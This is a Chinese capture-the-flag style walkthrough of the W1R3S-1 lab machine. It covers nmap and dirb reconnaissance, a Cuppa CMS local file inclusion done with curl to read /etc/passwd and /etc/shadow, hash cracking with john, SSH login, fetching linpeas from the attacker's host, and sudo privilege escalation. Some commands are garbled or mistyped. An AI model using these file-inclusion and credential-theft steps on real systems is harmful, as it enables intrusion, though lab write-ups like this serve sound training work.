5、项目五:W1R3S-1
1)信息收集
1、nmap挖掘信息
nmap -sC -sV -p- -O 192.168.64.178
开放端口:21、22、80、3306
frp测试登录:anonymous anonymous
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9Z71KYh0-1673875302376)(C:\Users\ADMINI~1\AppData\Local\Temp\ksohtml7796\wps98.jpg)]
ls下面发现三个文件
get 到本地发现打开没有有用信息
2、页面爆破
登录页面没有消息
直接爆破页面
dirb http://192.168.64.178
查找出该页面存在administrator目录:
80web端口访问: http://192.168.64.178/administrator/installation/
发现是Title[Cuppa CMS]框架!CuppaCMS是一套内容管理系统(CMS)!
3、Cuppa CMS LFI****利用
谷歌搜索:Cuppa CMS exploit
https://www.exploit-db.com/exploits/25971
该漏洞发现为文件包含漏洞:利用如下
利用文件漏洞攻击
http://192.168.64.178/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
这里post请求看不到目录
改为在kali上get请求查看目录,–data-urlencode:
在新版本的CURL中,提供了新的选项 --data-urlencode,通过该选项提供的参数会自动转义特殊字符。
Post请求
curl --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd
http://192.168.64.178/administrator/alerts/alertConfigField.phpcurl -s --data-urlencode
urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow
http://192.168.64.178/administrator/alerts/alertConfigField.php
Shadow下发现一个密匙
保存密匙用来破解
w1r3s: 6 6 6xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
爆破获得密码
但是提示已经破解过,需要john --show password.txt 查看已经爆破过的
computer (w1r3s)
ssh w1r3s@102.168.64.178
利用密码进行ssh登录
2)提权
确保kali有linpeas这个组件
上传组件linpeas从本地kali到靶机上,
这里一定注意:ip地址是kali,传输协议是http,别打错
wget http://192.168.64.165:8081/linpeas.sh
./使用linpeas开始扫描本地网站信息
跑出很多信息,这里不一一列举,包括密匙、sudo,这里直接利用sudo
sudo提权,这里发现sudo下的信息提示all权限、且文件全是r,所以直接用
sudu 后密码是computer
总结:
这里产生文件上传漏洞的关键是include_once,查看源码
sudu 后密码是computer
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
